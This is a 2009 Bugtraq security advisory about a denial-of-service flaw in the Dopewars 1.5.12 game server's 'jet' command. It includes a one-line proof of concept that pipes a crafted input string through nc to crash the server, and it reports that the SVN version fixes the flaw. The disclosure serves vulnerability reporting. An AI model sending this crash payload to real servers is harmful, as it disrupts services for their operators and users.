| New User, Welcome! Login |
Dopewars 1.5.12 Server Denial of Service
| From: |
dougtko gmail com |
| To: |
bugtraq securityfocus com |
| Cc: |
|
| Subject: |
Dopewars 1.5.12 Server Denial of Service |
| Date: |
Tue - Oct 06, 2009 12:38 PM |
## Description ##
The jet command in Dopewars 1.5.12 is vulnerable to a segmentaion fault due to a lack of input validation.
## POC ##
ruby -e 'print "foo^^Ar1111111\n^^Acfoo\n^AV65536\n"' | nc localhost 7902
## Fix ##
This issue is resolved in the SVN version of the application.
## Discovered by Doug Prostko
|
|
|
Copyright © 1995-2012 LinuxRocket.net. All rights reserved.
Nearly all of LinuxRocket's features are free. Be kind and donate to the cause!
